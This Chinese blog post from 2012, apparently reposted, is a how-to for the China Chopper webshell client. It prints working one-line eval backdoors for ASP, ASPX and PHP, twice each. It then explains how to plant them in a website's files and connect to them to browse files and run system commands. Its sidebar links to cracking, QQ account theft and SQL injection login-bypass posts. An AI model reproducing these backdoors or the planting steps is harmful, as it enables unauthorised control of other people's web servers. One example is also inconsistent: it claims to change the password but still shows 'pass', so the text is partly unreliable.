当前位置:首页 > 随笔 > 正文内容

一句话与中国菜刀的用法

光的传人13年前 (2012-11-15)随笔9394

 注:本文转载,仅用来个人学习。

菜刀是用来连一句话的,asp、aspx、php的一句话菜刀都可以连,只是这几种一句话语句不一样。
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,比如我想把asp的一句话的密码改成drvfan,那么改完之后就是这样的:
<%eval request(“pass”)%>
其他同理。
要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。
当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp.php文件,这个asp.php文件的全部内容就只有一个一句话,也是可以的。
插入了一句话木马,下面就是连接了。
在菜刀主界面,右击,选择“添加”,
在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的可以不用填,
填完之后单击“添加”,就可以了。
添加完毕后,你的这个一句话的shell会显示到菜刀主界面里,鼠标右击它,选择“文件管理”,就可以看到网站上的文件了
所以,使用菜刀,一定要熟练运用一句话
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
在菜刀工具里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能
如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了

扫描二维码推送至手机访问。

版权声明:本文由光的传人博客www.liu16.com发布,如需转载请注明出处。

本文链接:http://www.liu16.com/post/maicaidao.html

标签: 黑客
分享给朋友:

相关文章

清华朱令铊中毒事件

清华朱令铊中毒事件

我只希望,每个热心网友的关注能促使此案重启,也许七年前的网络力量还不够强大,但是如今的网络真的是朱令铊中毒真相大白的最后希望了!社会舆论的力量一定能胜过强权!关于此案的一些细节,我看了很多,特转发此文,希望能尽自己微薄之力,让更多的热心网友...

软件破解常用汇编指令

软件破解常用汇编指令

cmp a,b // 比较a与bmov a,b // 把b值送给a值,使a=bret // 返回主程序nop // 无作用,英文(no operation)简写,意思“do nothing”(机器码90)call // 调用子程序,子程序以...

捐你妹~《北京政府紧急呼吁向灾民捐款》

捐你妹~《北京政府紧急呼吁向灾民捐款》

 在群里看到一篇文章别的不错,特此转载(本博客很少转载的哦)!腾讯网发出《北京政府紧急呼吁向灾民捐款)的新闻之后,瞬间就N万多条骂论.大家看看今年他们替我们捐的款吧...  1、2012年1月18日,中国向非盟提供6亿美...

QQ盗号方法——既然有技术盗号,就不要用弱智手法骗人!

QQ盗号方法——既然有技术盗号,就不要用弱智手法骗人!

今天正倒腾着博客广告位的事,突然一个很久没联系的大学弟兄呼叫我,我赶紧一看,上来第一句话就是:“妳銀航卡有手機短信提示沒”尼玛,一看就知道被盗号了!还用什么繁体字,真尼玛弱智!我就想不明白,既然有技术盗别人QQ,为什么会弱智到这个地步呢?真...

林丹,男人?请不要侮辱这两个字!不背叛才男人!

林丹,男人?请不要侮辱这两个字!不背叛才男人!

之所以起个这样的标题,不是标题党,是有根据的!百度百科上讲,男人定义是这样的“男人同女人相对,从生理学上讲,具有xy染色体的人就是男人。在生理、心理上具有区别于女人的特征。如具有男性生殖系统,具有男人的气质和阳刚之美。从动物学上讲,男人即为...

PHP万能密码

PHP万能密码

说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是百分之百。可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了PHP注入。其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP...

评论列表

空气源
13年前 (2013-04-07)

php的不懂呀!路过支持一下呗

健康使者
13年前 (2012-12-20)

学习了

女装报告
13年前 (2012-12-11)

这是要教我们啥呀?

智能电网
13年前 (2012-12-06)

鸭梨山大,楼主这篇藐似没看懂

长安婚纱摄影
13年前 (2012-11-30)

鸭梨,太有才了!

南阳金巴黎婚纱摄影
13年前 (2012-11-24)

好,顶

奶茶
13年前 (2012-11-22)

菜刀不但是用来切菜还可以做其他很多东西。。。

wordpress博客主机
13年前 (2012-11-21)

学习了

霍致永博客
13年前 (2012-11-20)

这个标题太震撼啦哈哈欢迎来访

快播电影
13年前 (2012-11-20)

看不懂 PHP了,吐血了

李志红博客
13年前 (2012-11-19)

不是很懂,只来看看。

男装
13年前 (2012-11-19)

看了半天,因为不懂,所以还是没有看懂

比分直播
13年前 (2012-11-16)

来学习了,谢谢分享

润初颜
13年前 (2012-11-16)

php的不懂呀!路过支持一下

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。